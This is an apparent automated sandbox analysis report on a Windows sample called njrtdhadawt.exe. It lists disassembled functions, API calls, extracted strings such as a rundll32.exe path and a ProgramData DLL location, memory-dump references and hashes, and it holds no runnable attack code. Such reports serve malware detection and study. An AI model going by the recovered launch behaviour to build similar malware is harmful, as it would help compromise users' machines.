                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcat$CloseOpenQueryValue_memset
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3891774339-0
                                                                                                                                                                                                                                                          • Opcode ID: 2a541586507085f8daf411474eecea4361142c833f44d289b32bff6dfaabe27f
                                                                                                                                                                                                                                                          • Instruction ID: edaf913e233a74cf327803a1017c62f3ca9cb13d7ae048540f62c4483fc618d7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a541586507085f8daf411474eecea4361142c833f44d289b32bff6dfaabe27f
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8941797288001D9FDF25EF64EC8AAFA77B9FF18304F5004A5A308E3151DA755E859F90
                                                                                                                                                                                                                                                          Function 6CD63E2F Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000001,?,6CD63C01,6CD60FD3,6CD60A3B,?,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760,0000000C,6CD60D6C), ref: 6CD63E3D
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CD63E4B
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CD63E64
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,6CD60C73,?,00000001,?,?,00000001,?,6CDB5760,0000000C,6CD60D6C,?,00000001,?), ref: 6CD63EB6
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 0d0183f1dd84654eeb05d9324e31bab871d77247b16e8725257d5bf2d5b5892e
                                                                                                                                                                                                                                                          • Instruction ID: 963056f5ccb746f80c91bf09eb794d99bf9822c3e93062f8e37ff86117518ffd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d0183f1dd84654eeb05d9324e31bab871d77247b16e8725257d5bf2d5b5892e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01B972609611AFFB1517779C845963678DB022B8F30032AE76182DF1FB62C845D1B4
                                                                                                                                                                                                                                                          Function 6CD4C160 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 6CD4C4D5, 6CD4C513
                                                                                                                                                                                                                                                          • assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 6CD4C4F2, 6CD4C534
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: freeaddrinfo
                                                                                                                                                                                                                                                          • String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
                                                                                                                                                                                                                                                          • API String ID: 2731292433-3544120690
                                                                                                                                                                                                                                                          • Opcode ID: 8222ee71e3350112e9c28b2fdb61448f53b41496f84f195cc40417c063e4c1eb
                                                                                                                                                                                                                                                          • Instruction ID: ce88e479776b424b5d77281c0b5fe6b471131837c37082c6719780f57bc91c57
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8222ee71e3350112e9c28b2fdb61448f53b41496f84f195cc40417c063e4c1eb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9CD166B5D00218CFDB18DF89D480AADBBB1FF88314F15816EE8096B7A1D7719949CFA4
                                                                                                                                                                                                                                                          Function 6CD512B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetStdHandle.KERNEL32(FFFFFFF4,?,?,?,?,?,?,?,?,?,?,?,?,00000000,6CD4B575,?), ref: 6CD512E7
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,6CD4B575,?), ref: 6CD512F6
                                                                                                                                                                                                                                                          • GetConsoleMode.KERNEL32(00000000,?), ref: 6CD5133A
                                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,6CDAA3E8,6CDAB3D4,?,6CD4981A,6CDAB3C4), ref: 6CD515CA
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • called `Result::unwrap()` on an `Err` value, xrefs: 6CD5157D
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Handle$CloseConsoleErrorLastMode
                                                                                                                                                                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                                                                                                                                                                          • API String ID: 1170577072-2333694755
                                                                                                                                                                                                                                                          • Opcode ID: 61ba6c8187d4428885be510c74529d466003763ba48f85dab5890585fbbc7fd9
                                                                                                                                                                                                                                                          • Instruction ID: 40e1c682a10c209bb58537a27add6912e4fd08ef61bc0dcff3d536ed116b3afe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61ba6c8187d4428885be510c74529d466003763ba48f85dab5890585fbbc7fd9
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A391DFB0D04248EBEF00CF94D890BEEBFB4AF06308F448549E855ABBA1D774D955CBA1
                                                                                                                                                                                                                                                          Function 00FF2B31 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                            • Part of subcall function 00FF070A: lstrcpyA.KERNEL32(00000000,00000000,?,00FF724D,0101572D,?,?,?,?,00FF8011), ref: 00FF0730
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrlenA.KERNEL32(?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0840
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcpyA.KERNEL32(00000000,?,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0868
                                                                                                                                                                                                                                                            • Part of subcall function 00FF082C: lstrcatA.KERNEL32(?,00000000,?,?,00FF726B,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF0873
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07B0: lstrcpyA.KERNEL32(00000000,?,?,00FF7286,01015C00,00000000,0101572D,?,?,?,?,00FF8011), ref: 00FF07E0
                                                                                                                                                                                                                                                            • Part of subcall function 00FF1E6D: GetSystemTime.KERNEL32(?,010157AE,?), ref: 00FF1E9C
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcpyA.KERNEL32(00000000,?,0000000C,00FF74CC,010157A7), ref: 00FF0818
                                                                                                                                                                                                                                                            • Part of subcall function 00FF07EA: lstrcatA.KERNEL32(?,?), ref: 00FF0822
                                                                                                                                                                                                                                                          • ShellExecuteEx.SHELL32(?), ref: 00FF2D53
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                                                                                                          • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                          • API String ID: 2215929589-2108736111
                                                                                                                                                                                                                                                          • Opcode ID: 08b12de7c8cbfb3740470aefedef90929290d38260be980916bc2b66a1d1d0cb
                                                                                                                                                                                                                                                          • Instruction ID: f81861766b756977234020a38cbef13edeb3ca3831bb725ef10ae4a784a26d1c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08b12de7c8cbfb3740470aefedef90929290d38260be980916bc2b66a1d1d0cb
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E71A672D0015D9ACB50FBA6DC429DDB7B8AF04300F514462FA50B7227DBB97E46ABD0
                                                                                                                                                                                                                                                          Function 00FE88BB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 00FE8930
                                                                                                                                                                                                                                                          • LocalAlloc.KERNEL32(00000040,-0000001F,?,?,?), ref: 00FE8965
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AllocLocal_memset
                                                                                                                                                                                                                                                          • String ID: ERROR_V128$v10$v20
                                                                                                                                                                                                                                                          • API String ID: 52611349-1964637325
                                                                                                                                                                                                                                                          • Opcode ID: 625c52f039c1b30bc38927f2db646e65ab685aa4499c8f77ceb3ef4f74a209df
                                                                                                                                                                                                                                                          • Instruction ID: 20e86fbe0e985cd2b983a17e04cd3df7d6adc77e3c47a6937d7255eb0eab0e04
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 625c52f039c1b30bc38927f2db646e65ab685aa4499c8f77ceb3ef4f74a209df
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E31B372E00148ABDF10AFA6CC41AEE7BB8BF44B60F154125F905EB285DB74AD419B91
                                                                                                                                                                                                                                                          Function 6CD67703 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          • C:\Users\user\Desktop\njrtdhadawt.exe, xrefs: 6CD6771F
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\njrtdhadawt.exe
                                                                                                                                                                                                                                                          • API String ID: 0-1592276734
                                                                                                                                                                                                                                                          • Opcode ID: 457e01b26ba4c4de9c967d0a77267d241deb3418913185b4c88be0969f0f2d93
                                                                                                                                                                                                                                                          • Instruction ID: b09afffcc21ae0126f1e52c52e24ab4b0c3793d16764dd32f9005db220e4df21
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 457e01b26ba4c4de9c967d0a77267d241deb3418913185b4c88be0969f0f2d93
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C215E71604209BF9B10AF77DC8098BB7A9AF45768F164625E914D7E60E731EC44CBA0
                                                                                                                                                                                                                                                          Function 00FEF28C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FEF2A2
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E6FA
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: __CxxThrowException@8.LIBCMT ref: 0100E70F
                                                                                                                                                                                                                                                            • Part of subcall function 0100E6E5: std::exception::exception.LIBCMT ref: 0100E720
                                                                                                                                                                                                                                                          • std::_Xinvalid_argument.LIBCPMT ref: 00FEF2C1
                                                                                                                                                                                                                                                          • _memmove.LIBCMT ref: 00FEF2FB
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1550677894.0000000000FE1000.00000080.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550658530.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550705762.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550724668.000000000101C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010D6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000010EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000011FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001205000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000120C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001213000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000122B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000123E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.000000000124A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001277000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.0000000001298000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1550787502.00000000012C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1551213407.00000000012DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_fe0000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                                                                                                                                                                                                          • String ID: invalid string position$string too long
                                                                                                                                                                                                                                                          • API String ID: 3404309857-4289949731
                                                                                                                                                                                                                                                          • Opcode ID: c272150b42ea1ccbeff8d2f44727d070972d02c6025760eb659f44c8100fb90e
                                                                                                                                                                                                                                                          • Instruction ID: 31e54079eb1364f244920450afb906c3d4f321308b899f0e40ecca6c6e39013a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c272150b42ea1ccbeff8d2f44727d070972d02c6025760eb659f44c8100fb90e
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E5110835700241AFDB14EF6ED880969B3A5FF55324B500539F556CB282C370ED48D791
                                                                                                                                                                                                                                                          Function 6CD6570D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9F8E84B1,00000000,?,00000000,6CD70110,000000FF,?,6CD656A7,?,?,6CD6567B,?), ref: 6CD65742
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CD65754
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,6CD70110,000000FF,?,6CD656A7,?,?,6CD6567B,?), ref: 6CD65776
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1554966712.000000006CD11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CD10000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1554949928.000000006CD10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555023791.000000006CD71000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555082296.000000006CDB7000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1555100832.000000006CDB9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6cd10000_njrtdhadawt.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
